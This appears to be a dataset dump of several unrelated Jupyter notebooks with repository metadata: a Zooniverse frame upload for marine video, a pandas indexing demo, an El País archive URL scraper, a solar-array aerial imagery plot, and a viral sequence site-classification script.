"import argparse, os, cv2, re\nimport utils.db_utils as db_utils\nimport pandas as pd\nimport numpy as np\nimport pims\n\nfrom PIL import Image\nfrom datetime import date\nfrom utils.zooniverse_utils import auth_session\nfrom panoptes_client import (\n SubjectSet,\n Subject,\n Project,\n Panoptes,\n)\nfrom upload_frames import get_species_frames, extract_frames\nfrom utils.summary_utils import clips_summary",
"_____no_output_____"
],
[
"db_path = \"/data/db_config/koster_lab-nm.db\"\nuser = \"\"\npassword = \"\"\nconn = db_utils.create_connection(db_path)\nframes_folder = \"/data/deepsea_anemone_frames/\"",
"_____no_output_____"
],
[
"clips_summary(db_path)",
"_____no_output_____"
],
[
"#### Connect to koster_db\nconn = db_utils.create_connection(db_path)\n\n# Connect to Zooniverse\nkoster_project = auth_session(user, password)\n\n# Get id of species of interest\nspecies_id = 5.0\n\n# Identify n number of frames per classified clip that contains species of interest \nsp_frames_df = get_species_frames(species_id, conn, 3)\n\n# Get info of frames already uploaded\nuploaded_frames_df = pd.read_sql_query(\n f\"SELECT movie_id, frame_number, frame_exp_sp_id FROM subjects WHERE frame_exp_sp_id='{species_id}' and subject_type='frame'\",\n conn,\n)\n\n# Upload frames to Zooniverse that have not been uploaded\nif len(sp_frames_df) == 0:\n print(\n \"There are no subjects to upload, this may be because all of the subjects have already been uploaded\"\n )\n raise\n\nelse:\n # Create the folder to store the frames if not exist\n if not os.path.exists(frames_folder):\n os.mkdir(frames_folder)\n\n # Extract the frames and save them\n sp_frames_df[\"frame_path\"] = extract_frames(sp_frames_df, frames_folder)\n\n # Select koster db metadata associated with each frame\n sp_frames_df[\"label\"] = species_id\n sp_frames_df[\"subject_type\"] = \"frame\"\n\n sp_frames_df = sp_frames_df[\n [\n \"frame_path\",\n \"fpath\",\n \"frame_number\",\n \"fps\",\n \"movie_id\",\n \"label\",\n \"frame_exp_sp_id\",\n \"subject_type\",\n ]\n ]\n\n # Save the df as the subject metadata\n subject_metadata = sp_frames_df.set_index('frame_path').to_dict('index')",
"Videos are read in\n1632\nframes added to df\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_4500_5.0.jpg\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_4525_5.0.jpg\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_4550_5.0.jpg\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_0_5.0.jpg\nsaving /data/deepsea_anemone_frames/000114 TMBL-ROV 2000 Säckenrevet Tape 55_frame_25_5.0.jpg\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb014d69d7c3cdbe45a92fa60f925a3279e7e85e | 13,948 | ipynb | Jupyter Notebook | notebooks/pandas/df_assign_col_values.ipynb | codenamewei/pydata-science-playground | aa147b003aa4bd2afa2a6a5f00101cc0cb340f9f | [
"MIT"
] | null | null | null | notebooks/pandas/df_assign_col_values.ipynb | codenamewei/pydata-science-playground | aa147b003aa4bd2afa2a6a5f00101cc0cb340f9f | [
"MIT"
] | null | null | null | notebooks/pandas/df_assign_col_values.ipynb | codenamewei/pydata-science-playground | aa147b003aa4bd2afa2a6a5f00101cc0cb340f9f | [
"MIT"
] | null | null | null | 25.268116 | 149 | 0.329725 | [
[
[
"import pandas as pd \nimport numpy as np\n\nrows = 5\ndf = pd.DataFrame(np.random.randint(0,rows,size=(rows, 2)), columns=list('AB'))\n\ndf[\"C\"] = [0,0, 1, 1, 0]\ndf[\"D\"] = [-1, 6, -1, -1, 6]\n\ndf.head(5)",
"_____no_output_____"
]
],
[
[
"### Assign value of B = 1000 where C = 1 & D = -1 &",
"_____no_output_____"
]
],
[
[
"df2 = df\ndf2.loc[df2.D.eq(-1), 'B'] = 1000\n\ndf2.head(5)",
"_____no_output_____"
],
[
"df3 = df\ndf3.loc[df3.D.eq(-1) & df3.C.eq(1), 'B'] = 1000\n\ndf3.head(5)",
"_____no_output_____"
]
],
[
[
"### this works, but with warnings",
"_____no_output_____"
]
],
[
[
"df1 = df\ndf1[df1.D == -1].B = 1000\ndf1.head(5)\n",
"C:\\Users\\codenamewei\\.conda\\envs\\data-science-playground\\lib\\site-packages\\pandas\\core\\generic.py:5494: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame.\nTry using .loc[row_indexer,col_indexer] = value instead\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n self[name] = value\n"
]
],
[
[
"# Use .loc[row_indexer,col_indexer] = value instead\n",
"_____no_output_____"
],
[
"### This works, but with warning",
"_____no_output_____"
]
],
[
[
"df_ = df\n\ndf_.iloc[df_.loc[df_.D == -1].index[0]].B = 1000\n\ndf_.head(5)",
"C:\\Users\\codenamewei\\.conda\\envs\\data-science-playground\\lib\\site-packages\\pandas\\core\\generic.py:5494: SettingWithCopyWarning: \nA value is trying to be set on a copy of a slice from a DataFrame\n\nSee the caveats in the documentation: https://pandas.pydata.org/pandas-docs/stable/user_guide/indexing.html#returning-a-view-versus-a-copy\n self[name] = value\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
]
] |
cb015732e617447c2025905e181e7b7c63a13d44 | 141,006 | ipynb | Jupyter Notebook | resources/notebooks/OldScrapper/ElPais-getUrlsFromHemeroteca.ipynb | cfespinoza/comments-retriever | 6e46053d66297f59da2fa93a00a58158dec195ca | [
"Apache-2.0"
] | null | null | null | resources/notebooks/OldScrapper/ElPais-getUrlsFromHemeroteca.ipynb | cfespinoza/comments-retriever | 6e46053d66297f59da2fa93a00a58158dec195ca | [
"Apache-2.0"
] | 1 | 2021-12-13T20:23:17.000Z | 2021-12-13T20:23:17.000Z | resources/notebooks/OldScrapper/ElPais-getUrlsFromHemeroteca.ipynb | cfespinoza/comments-retriever | 6e46053d66297f59da2fa93a00a58158dec195ca | [
"Apache-2.0"
] | null | null | null | 63.948299 | 363 | 0.641717 | [
[
[
"import sys\nfrom PyQt5 import QtCore, QtWidgets, QtWebEngineWidgets\nfrom lxml import html as htmlRenderer\nimport requests\nimport json\nfrom datetime import date, datetime, timedelta",
"_____no_output_____"
],
[
"def render(source_url):\n \"\"\"Fully render HTML, JavaScript and all.\"\"\"\n\n import sys\n from PyQt5.QtWidgets import QApplication\n from PyQt5.QtCore import QUrl\n from PyQt5.QtWebEngineWidgets import QWebEngineView\n\n class Render(QWebEngineView):\n def __init__(self, url):\n self.html = None\n self.app = QApplication(sys.argv)\n QWebEngineView.__init__(self)\n self.loadFinished.connect(self._loadFinished)\n #self.setHtml(html)\n self.load(QUrl(url))\n self.app.exec_()\n\n def _loadFinished(self, result):\n # This is an async call, you need to wait for this\n # to be called before closing the app\n self.page().toHtml(self._callable)\n\n def _callable(self, data):\n self.html = data\n # Data has been stored, it's safe to quit the app\n self.app.quit()\n\n return Render(source_url).html",
"_____no_output_____"
]
],
[
[
"# Aux Functions",
"_____no_output_____"
]
],
[
[
"def generateDates(start=date(2019, 1, 1), end=date(2019, 8, 31), delta=timedelta(days=1), strFormat=\"\"):\n curr = start\n dates = []\n while curr < end:\n if strFormat == \"\":\n dates.append(str(curr))\n else:\n dates.append(curr.strftime(strFormat))\n curr += delta\n return dates",
"_____no_output_____"
],
[
"len(generateDates(date(2019, 1, 1), date(2019, 8, 31)))",
"_____no_output_____"
],
[
"a = generateDates(date(2019, 1, 1), date(2019, 8, 31))",
"_____no_output_____"
],
[
"date_1 =a[0]",
"_____no_output_____"
],
[
"date_1.strftime(\"%Y/%m/%d\")",
"_____no_output_____"
],
[
"date_1.day.to_bytes()",
"_____no_output_____"
],
[
"date_1.day",
"_____no_output_____"
],
[
"str(date_1).replace('-', '/')",
"_____no_output_____"
],
[
"dateFormat = \"%Y/%m/%d\"\ndatesBase = generateDates(date(2019, 1, 1), date(2019, 8, 31), strFormat=dateFormat)\nextraDateInfo = [\"m\", \"t\", \"n\"]\nurlTemplate = \"https://elpais.com/hemeroteca/elpais/{date}/{partOfDay}/portada.html\"\ndef generateHemerotecaUrls(urlBase, dates, extraInfo):\n urlsPerDay = []\n print(\" \\t Url-Base: {}\".format(urlBase))\n for d in dates:\n partOfDayUrls = [ urlBase.format(date=d, partOfDay=p) for p in extraInfo ]\n urlsPerDay = urlsPerDay + partOfDayUrls\n print(\" \\t -> urlsPerDay length: {}\".format(len(urlsPerDay)))\n return urlsPerDay\n ",
"_____no_output_____"
],
[
"urlTemplate",
"_____no_output_____"
],
[
"generateHemerotecaUrls(urlTemplate, datesBase, extraDateInfo)",
" \t Url-Base: https://elpais.com/hemeroteca/elpais/{date}/{partOfDay}/portada.html\n \t -> urlsPerDay length: 3\n \t -> urlsPerDay length: 6\n \t -> urlsPerDay length: 9\n \t -> urlsPerDay length: 12\n \t -> urlsPerDay length: 15\n \t -> urlsPerDay length: 18\n \t -> urlsPerDay length: 21\n \t -> urlsPerDay length: 24\n \t -> urlsPerDay length: 27\n \t -> urlsPerDay length: 30\n \t -> urlsPerDay length: 33\n \t -> urlsPerDay length: 36\n \t -> urlsPerDay length: 39\n \t -> urlsPerDay length: 42\n \t -> urlsPerDay length: 45\n \t -> urlsPerDay length: 48\n \t -> urlsPerDay length: 51\n \t -> urlsPerDay length: 54\n \t -> urlsPerDay length: 57\n \t -> urlsPerDay length: 60\n \t -> urlsPerDay length: 63\n \t -> urlsPerDay length: 66\n \t -> urlsPerDay length: 69\n \t -> urlsPerDay length: 72\n \t -> urlsPerDay length: 75\n \t -> urlsPerDay length: 78\n \t -> urlsPerDay length: 81\n \t -> urlsPerDay length: 84\n \t -> urlsPerDay length: 87\n \t -> urlsPerDay length: 90\n \t -> urlsPerDay length: 93\n \t -> urlsPerDay length: 96\n \t -> urlsPerDay length: 99\n \t -> urlsPerDay length: 102\n \t -> urlsPerDay length: 105\n \t -> urlsPerDay length: 108\n \t -> urlsPerDay length: 111\n \t -> urlsPerDay length: 114\n \t -> urlsPerDay length: 117\n \t -> urlsPerDay length: 120\n \t -> urlsPerDay length: 123\n \t -> urlsPerDay length: 126\n \t -> urlsPerDay length: 129\n \t -> urlsPerDay length: 132\n \t -> urlsPerDay length: 135\n \t -> urlsPerDay length: 138\n \t -> urlsPerDay length: 141\n \t -> urlsPerDay length: 144\n \t -> urlsPerDay length: 147\n \t -> urlsPerDay length: 150\n \t -> urlsPerDay length: 153\n \t -> urlsPerDay length: 156\n \t -> urlsPerDay length: 159\n \t -> urlsPerDay length: 162\n \t -> urlsPerDay length: 165\n \t -> urlsPerDay length: 168\n \t -> urlsPerDay length: 171\n \t -> urlsPerDay length: 174\n \t -> urlsPerDay length: 177\n \t -> urlsPerDay length: 180\n \t -> urlsPerDay length: 183\n \t -> urlsPerDay length: 186\n \t -> urlsPerDay length: 189\n \t -> urlsPerDay length: 192\n \t -> urlsPerDay length: 195\n \t -> urlsPerDay length: 198\n \t -> urlsPerDay length: 201\n \t -> urlsPerDay length: 204\n \t -> urlsPerDay length: 207\n \t -> urlsPerDay length: 210\n \t -> urlsPerDay length: 213\n \t -> urlsPerDay length: 216\n \t -> urlsPerDay length: 219\n \t -> urlsPerDay length: 222\n \t -> urlsPerDay length: 225\n \t -> urlsPerDay length: 228\n \t -> urlsPerDay length: 231\n \t -> urlsPerDay length: 234\n \t -> urlsPerDay length: 237\n \t -> urlsPerDay length: 240\n \t -> urlsPerDay length: 243\n \t -> urlsPerDay length: 246\n \t -> urlsPerDay length: 249\n \t -> urlsPerDay length: 252\n \t -> urlsPerDay length: 255\n \t -> urlsPerDay length: 258\n \t -> urlsPerDay length: 261\n \t -> urlsPerDay length: 264\n \t -> urlsPerDay length: 267\n \t -> urlsPerDay length: 270\n \t -> urlsPerDay length: 273\n \t -> urlsPerDay length: 276\n \t -> urlsPerDay length: 279\n \t -> urlsPerDay length: 282\n \t -> urlsPerDay length: 285\n \t -> urlsPerDay length: 288\n \t -> urlsPerDay length: 291\n \t -> urlsPerDay length: 294\n \t -> urlsPerDay length: 297\n \t -> urlsPerDay length: 300\n \t -> urlsPerDay length: 303\n \t -> urlsPerDay length: 306\n \t -> urlsPerDay length: 309\n \t -> urlsPerDay length: 312\n \t -> urlsPerDay length: 315\n \t -> urlsPerDay length: 318\n \t -> urlsPerDay length: 321\n \t -> urlsPerDay length: 324\n \t -> urlsPerDay length: 327\n \t -> urlsPerDay length: 330\n \t -> urlsPerDay length: 333\n \t -> urlsPerDay length: 336\n \t -> urlsPerDay length: 339\n \t -> urlsPerDay length: 342\n \t -> urlsPerDay length: 345\n \t -> urlsPerDay length: 348\n \t -> urlsPerDay length: 351\n \t -> urlsPerDay length: 354\n \t -> urlsPerDay length: 357\n \t -> urlsPerDay length: 360\n \t -> urlsPerDay length: 363\n \t -> urlsPerDay length: 366\n \t -> urlsPerDay length: 369\n \t -> urlsPerDay length: 372\n \t -> urlsPerDay length: 375\n \t -> urlsPerDay length: 378\n \t -> urlsPerDay length: 381\n \t -> urlsPerDay length: 384\n \t -> urlsPerDay length: 387\n \t -> urlsPerDay length: 390\n \t -> urlsPerDay length: 393\n \t -> urlsPerDay length: 396\n \t -> urlsPerDay length: 399\n \t -> urlsPerDay length: 402\n \t -> urlsPerDay length: 405\n \t -> urlsPerDay length: 408\n \t -> urlsPerDay length: 411\n \t -> urlsPerDay length: 414\n \t -> urlsPerDay length: 417\n \t -> urlsPerDay length: 420\n \t -> urlsPerDay length: 423\n \t -> urlsPerDay length: 426\n \t -> urlsPerDay length: 429\n \t -> urlsPerDay length: 432\n \t -> urlsPerDay length: 435\n \t -> urlsPerDay length: 438\n \t -> urlsPerDay length: 441\n \t -> urlsPerDay length: 444\n \t -> urlsPerDay length: 447\n \t -> urlsPerDay length: 450\n \t -> urlsPerDay length: 453\n \t -> urlsPerDay length: 456\n \t -> urlsPerDay length: 459\n \t -> urlsPerDay length: 462\n \t -> urlsPerDay length: 465\n \t -> urlsPerDay length: 468\n \t -> urlsPerDay length: 471\n \t -> urlsPerDay length: 474\n \t -> urlsPerDay length: 477\n \t -> urlsPerDay length: 480\n \t -> urlsPerDay length: 483\n \t -> urlsPerDay length: 486\n \t -> urlsPerDay length: 489\n \t -> urlsPerDay length: 492\n \t -> urlsPerDay length: 495\n \t -> urlsPerDay length: 498\n \t -> urlsPerDay length: 501\n \t -> urlsPerDay length: 504\n \t -> urlsPerDay length: 507\n \t -> urlsPerDay length: 510\n \t -> urlsPerDay length: 513\n \t -> urlsPerDay length: 516\n \t -> urlsPerDay length: 519\n \t -> urlsPerDay length: 522\n \t -> urlsPerDay length: 525\n \t -> urlsPerDay length: 528\n \t -> urlsPerDay length: 531\n \t -> urlsPerDay length: 534\n \t -> urlsPerDay length: 537\n \t -> urlsPerDay length: 540\n \t -> urlsPerDay length: 543\n \t -> urlsPerDay length: 546\n \t -> urlsPerDay length: 549\n \t -> urlsPerDay length: 552\n \t -> urlsPerDay length: 555\n \t -> urlsPerDay length: 558\n \t -> urlsPerDay length: 561\n \t -> urlsPerDay length: 564\n \t -> urlsPerDay length: 567\n \t -> urlsPerDay length: 570\n \t -> urlsPerDay length: 573\n \t -> urlsPerDay length: 576\n \t -> urlsPerDay length: 579\n \t -> urlsPerDay length: 582\n \t -> urlsPerDay length: 585\n \t -> urlsPerDay length: 588\n \t -> urlsPerDay length: 591\n \t -> urlsPerDay length: 594\n \t -> urlsPerDay length: 597\n \t -> urlsPerDay length: 600\n \t -> urlsPerDay length: 603\n \t -> urlsPerDay length: 606\n \t -> urlsPerDay length: 609\n \t -> urlsPerDay length: 612\n \t -> urlsPerDay length: 615\n \t -> urlsPerDay length: 618\n \t -> urlsPerDay length: 621\n \t -> urlsPerDay length: 624\n \t -> urlsPerDay length: 627\n \t -> urlsPerDay length: 630\n \t -> urlsPerDay length: 633\n \t -> urlsPerDay length: 636\n \t -> urlsPerDay length: 639\n \t -> urlsPerDay length: 642\n \t -> urlsPerDay length: 645\n \t -> urlsPerDay length: 648\n \t -> urlsPerDay length: 651\n \t -> urlsPerDay length: 654\n \t -> urlsPerDay length: 657\n \t -> urlsPerDay length: 660\n \t -> urlsPerDay length: 663\n \t -> urlsPerDay length: 666\n \t -> urlsPerDay length: 669\n \t -> urlsPerDay length: 672\n \t -> urlsPerDay length: 675\n \t -> urlsPerDay length: 678\n \t -> urlsPerDay length: 681\n \t -> urlsPerDay length: 684\n \t -> urlsPerDay length: 687\n \t -> urlsPerDay length: 690\n \t -> urlsPerDay length: 693\n \t -> urlsPerDay length: 696\n \t -> urlsPerDay length: 699\n \t -> urlsPerDay length: 702\n \t -> urlsPerDay length: 705\n \t -> urlsPerDay length: 708\n \t -> urlsPerDay length: 711\n \t -> urlsPerDay length: 714\n \t -> urlsPerDay length: 717\n \t -> urlsPerDay length: 720\n \t -> urlsPerDay length: 723\n \t -> urlsPerDay length: 726\n"
]
],
[
[
"# Getting urls",
"_____no_output_____"
]
],
[
[
"url=\"https://www.elpais.com/\"\nrenderUrl = render(url)\nrenderedPage = htmlRenderer.fromstring(renderUrl)",
"_____no_output_____"
],
[
"auxLinks = renderedPage.xpath(\"//a/@href\")",
"_____no_output_____"
],
[
"# obtener links, cuidado que alguno ya empieza por http...\nauxFinalLinks = list(dict.fromkeys([link for link in auxLinks \n if not link.endswith(\"/\") \n and not \"#comentarios\" in link\n and not link.endswith(\"=home\")]))\n",
"_____no_output_____"
],
[
"auxFinalLinks",
"_____no_output_____"
],
[
"len(auxFinalLinks)",
"_____no_output_____"
],
[
"finalLinks = []\nfor l in auxFinalLinks:\n if l.startswith(\"http\"):\n finalLinks.append(l)\n elif l.startswith(\"//\"):\n finalLinks.append(\"https:{}\".format(l))\n else:\n finalLinks.append(\"https://www.elpais.com{}\".format(l))\nprint(\" -> TOtal of url retrieved to extract comments: {}\".format(len(finalLinks)))",
" -> TOtal of url retrieved to extract comments: 373\n"
],
[
"finalLinks",
"_____no_output_____"
],
[
"# Url get info = https://elpais.com/ThreadeskupSimple?action=info&th=1564664936-bca025601586bc5a00ef0c26fdd878f6&rnd=1232123123",
"_____no_output_____"
],
[
"# # Url get comments = \n# https://elpais.com/OuteskupSimple?s=&rnd=0.7131093272405999&th=2&msg=1564664936-bca025601586bc5a00ef0c26fdd878f6&p=1&nummsg=40&tt=1\n# https://elpais.com/OuteskupSimple?s=&rnd=0.4308991070814918&th=2&msg=1564664936-bca025601586bc5a00ef0c26fdd878f6&p=2&nummsg=40&tt=1\n# https://elpais.com/OuteskupSimple?s=&rnd=0.17594169864899367&th=2&msg=1564664936-bca025601586bc5a00ef0c26fdd878f6&p=3&nummsg=40&tt=1",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb0160f21f6522164e1c6c5b9944c25bef292f45 | 672,878 | ipynb | Jupyter Notebook | ShowSolarArrayLocations.ipynb | ccai-course/Module2-Mitigation | bab5297d15aa400b691ca147e7234d945561a94b | [
"MIT"
] | null | null | null | ShowSolarArrayLocations.ipynb | ccai-course/Module2-Mitigation | bab5297d15aa400b691ca147e7234d945561a94b | [
"MIT"
] | null | null | null | ShowSolarArrayLocations.ipynb | ccai-course/Module2-Mitigation | bab5297d15aa400b691ca147e7234d945561a94b | [
"MIT"
] | null | null | null | 809.720818 | 253,858 | 0.939292 | [
[
[
"<a href=\"https://colab.research.google.com/github/ccai-course/Module2-Mitigation/blob/main/ShowSolarArrayLocations.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
" !pip install geopandas",
"Collecting geopandas\n Downloading geopandas-0.9.0-py2.py3-none-any.whl (994 kB)\n\u001b[K |████████████████████████████████| 994 kB 5.4 MB/s \n\u001b[?25hRequirement already satisfied: pandas>=0.24.0 in /usr/local/lib/python3.7/dist-packages (from geopandas) (1.1.5)\nCollecting pyproj>=2.2.0\n Downloading pyproj-3.1.0-cp37-cp37m-manylinux2010_x86_64.whl (6.6 MB)\n\u001b[K |████████████████████████████████| 6.6 MB 37.8 MB/s \n\u001b[?25hRequirement already satisfied: shapely>=1.6 in /usr/local/lib/python3.7/dist-packages (from geopandas) (1.7.1)\nCollecting fiona>=1.8\n Downloading Fiona-1.8.20-cp37-cp37m-manylinux1_x86_64.whl (15.4 MB)\n\u001b[K |████████████████████████████████| 15.4 MB 33 kB/s \n\u001b[?25hRequirement already satisfied: certifi in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (2021.5.30)\nCollecting munch\n Downloading munch-2.5.0-py2.py3-none-any.whl (10 kB)\nCollecting click-plugins>=1.0\n Downloading click_plugins-1.1.1-py2.py3-none-any.whl (7.5 kB)\nRequirement already satisfied: click>=4.0 in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (7.1.2)\nCollecting cligj>=0.5\n Downloading cligj-0.7.2-py3-none-any.whl (7.1 kB)\nRequirement already satisfied: setuptools in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (57.4.0)\nRequirement already satisfied: six>=1.7 in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (1.15.0)\nRequirement already satisfied: attrs>=17 in /usr/local/lib/python3.7/dist-packages (from fiona>=1.8->geopandas) (21.2.0)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.24.0->geopandas) (2.8.2)\nRequirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.24.0->geopandas) (2018.9)\nRequirement already satisfied: numpy>=1.15.4 in /usr/local/lib/python3.7/dist-packages (from pandas>=0.24.0->geopandas) (1.19.5)\nInstalling collected packages: munch, cligj, click-plugins, pyproj, fiona, geopandas\nSuccessfully installed click-plugins-1.1.1 cligj-0.7.2 fiona-1.8.20 geopandas-0.9.0 munch-2.5.0 pyproj-3.1.0\n"
],
[
"# Read in solar image\n\n# Import library functions to download and read images\nimport requests\nfrom io import BytesIO\n\n# Dataset: Distributed Solar Photovoltaic Array Location and Extent Data Set for Remote Sensing Object Identification\n# California Aerial Imagery SolarArrayPolygons.geojson\n\nurl = 'https://ndownloader.figshare.com/files/24115691'\n\ndownloader_response = requests.get(url)\nbyte_stream = BytesIO(downloader_response.content)\n\n# Import geopandas library for geospatial data\nimport geopandas as gpd\n\nsolar_array_polygons_df = gpd.read_file(byte_stream)\nsolar_array_polygons_df.head()",
"_____no_output_____"
],
[
"solar_array_polygons_df[solar_array_polygons_df['city'] == 'Oxnard']",
"_____no_output_____"
],
[
"# Read in solar image\n\n# Import library functions to download and read images\nimport requests\nfrom io import BytesIO\nfrom skimage import io\n\n# A Oxnard 621051913 Aerial Tile\ntile_url = 'https://ndownloader.figshare.com/files/5287822'\n\ndownloader_response = requests.get(tile_url)\nimg = io.imread(BytesIO(downloader_response.content))",
"_____no_output_____"
],
[
"import matplotlib.pyplot as plt\nplt.figure()\nplt.imshow(img)",
"_____no_output_____"
],
[
"from skimage import filters\nplt.figure()\nplt.imshow(filters.sobel(img[:,:,0]))",
"_____no_output_____"
],
[
"polygons_px = solar_array_polygons_df[solar_array_polygons_df['city'] == 'Oxnard'][solar_array_polygons_df['image_name'] == '621051913']['polygon_vertices_pixels']",
"/usr/local/lib/python3.7/dist-packages/geopandas/geodataframe.py:1299: UserWarning: Boolean Series key will be reindexed to match DataFrame index.\n result = super(GeoDataFrame, self).__getitem__(key)\n"
],
[
"import numpy as np\n\n# show one polygon with solar array inside\nn=2\npolygon_vertices = [np.array(eval(a)) for a in polygons_px]\ntop_left, bottom_right = (int(min(polygon_vertices[n][:,1])), int(min(polygon_vertices[n][:,0]))), (int(max(polygon_vertices[n][:,1]))+1, int(max(polygon_vertices[n][:,0]))+1)\n\nplt.figure()\nplt.imshow(img[top_left[0]-50:bottom_right[0]+50,top_left[1]-50:bottom_right[1]+50,:])\n\nplt.figure()\nplt.imshow(filters.sobel(img[top_left[0]-50:bottom_right[0]+50,top_left[1]-50:bottom_right[1]+50,0]))",
"_____no_output_____"
],
[
"top_left, bottom_right",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb01843afbd1f9daf5e700a2fd75ab61ac360952 | 18,581 | ipynb | Jupyter Notebook | antigenic_evolution/bhatt_test.ipynb | nextstrain/seasonal-cov | 9dee4e145d003b839729b86ff9c7b74bb8483e55 | [
"MIT"
] | 4 | 2020-03-24T21:54:12.000Z | 2020-03-26T19:12:05.000Z | antigenic_evolution/bhatt_test.ipynb | blab/seasonal-cov-adaptive-evolution | 9dee4e145d003b839729b86ff9c7b74bb8483e55 | [
"MIT"
] | null | null | null | antigenic_evolution/bhatt_test.ipynb | blab/seasonal-cov-adaptive-evolution | 9dee4e145d003b839729b86ff9c7b74bb8483e55 | [
"MIT"
] | null | null | null | 40.131749 | 142 | 0.492116 | [
[
[
"import math\nimport json\nimport pandas as pd\nimport numpy as np\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom scipy import stats",
"\nBad key \"text.kerning_factor\" on line 4 in\n/Users/katekistler/anaconda3/envs/nextstrain/lib/python3.6/site-packages/matplotlib/mpl-data/stylelib/_classic_test_patch.mplstyle.\nYou probably need to get an updated matplotlibrc file from\nhttps://github.com/matplotlib/matplotlib/blob/v3.1.3/matplotlibrc.template\nor from the matplotlib source distribution\n"
],
[
"#make test data set to sanity check\noutgroup_test = ['ATGGAGATT']\ntest_seqs = ['ATGGAGATT', 'ATGGAGAAT', 'ATGGAGATT',\n 'ATGGAGAAT', 'ATGGAGATC', 'ATCGAGATT',\n 'ATGGAGACT', 'ATGGAGATT', 'ATGGAGATT',\n 'ATGGGGATT', 'ATGCAGATT', 'ATGCAGATT', 'ATGGAGATT']\ntest_dates = [2010, 2010, 2011,\n 2012, 2012,\n 2013, 2013, 2013,\n 2014, 2014, 2014, 2014]\n",
"_____no_output_____"
],
[
"#given a polymorphism frequency, return bin\ndef frequency_binning(x):\n #nan frequencies are when there is no sequence coverage at the given position\n if math.isnan(x):\n f_bin = float('nan')\n else:\n if x == 1.0:\n f_bin = 'f'\n elif x>=0.75:\n f_bin = 'h'\n elif x<0.75 and x>=0.15:\n f_bin = 'm'\n elif x<0.15:\n f_bin='l'\n\n return f_bin",
"_____no_output_____"
],
[
"def walk_through_sites(outgroup_seq, outgroup_aa_seq, input_file_alignment, viruses):\n \n #at each site, count number of viruses with polymorphism\n count_polymorphic = np.zeros(len(outgroup_seq))\n #at each site, count totaly number of viruses\n count_total_unambiguous = np.zeros(len(outgroup_seq))\n \n count_replacement_mutations = np.zeros(len(outgroup_seq))\n count_silent_mutations = np.zeros(len(outgroup_seq))\n \n #at each site, list of nucleotide from each virus\n ingroup_bases = [[] for x in range(len(outgroup_seq))]\n\n with open(input_file_alignment, \"r\") as aligned_handle:\n for virus in SeqIO.parse(aligned_handle, \"fasta\"):\n #Only viruses in time window\n if virus.id in viruses:\n #check\n if len(virus.seq) != len(outgroup_seq):\n print(virus)\n elif len(virus.seq) == len(outgroup_seq): \n for pos in range(len(outgroup_seq)):\n outgroup_nt = str(outgroup_seq[pos])\n virus_nt = str(virus.seq[pos])\n #skip ambiguous sites\n if virus_nt != 'N':\n ingroup_bases[pos].append(virus_nt)\n count_total_unambiguous[pos]+=1\n if virus_nt != outgroup_nt:\n count_polymorphic[pos]+=1\n #determine silent or replacement\n codon = math.floor(pos/3)\n codon_pos = pos-(codon*3)\n if codon_pos == 0:\n codon_nt = virus.seq[pos:(pos+3)]\n elif codon_pos == 1:\n codon_nt = virus.seq[(pos-1):(pos+2)]\n elif codon_pos == 2:\n codon_nt = virus.seq[(pos-2):(pos+1)]\n codon_aa = codon_nt.translate()\n outgroup_aa = outgroup_aa_seq[codon]\n if codon_aa != outgroup_aa:\n count_replacement_mutations[pos]+=1\n elif codon_aa == outgroup_aa:\n count_silent_mutations[pos]+=1\n \n polymorphic_frequencies = count_polymorphic/count_total_unambiguous\n \n replacement_score = count_replacement_mutations/count_total_unambiguous\n\n freq_bins = [frequency_binning(x) for x in polymorphic_frequencies]\n \n return freq_bins, replacement_score, ingroup_bases",
"_____no_output_____"
],
[
"def determine_site_type(outgroup, ingroup):\n ingroup_bases_nan = set(ingroup)\n #remove 'nan's\n ingroup_bases = {x for x in ingroup_bases_nan if pd.notna(x)}\n \n if len(ingroup_bases) == 0:\n site_type = None\n \n elif len(ingroup_bases) != 0:\n #all ingroup bases are identical\n if len(ingroup_bases) == 1:\n if outgroup in ingroup_bases:\n site_type = 1\n elif outgroup not in ingroup_bases:\n site_type = 2\n\n #2 different bases in ingroup\n elif len(ingroup_bases) == 2:\n if outgroup in ingroup_bases:\n site_type = 3\n elif outgroup not in ingroup_bases:\n site_type = 4\n\n #3 different bases in ingroup\n elif len(ingroup_bases) == 3:\n if outgroup in ingroup_bases:\n site_type = 5\n elif outgroup not in ingroup_bases:\n site_type = 6\n\n #4 different bases in ingroup\n elif len(ingroup_bases) == 4:\n site_type = 7\n \n return site_type",
"_____no_output_____"
],
[
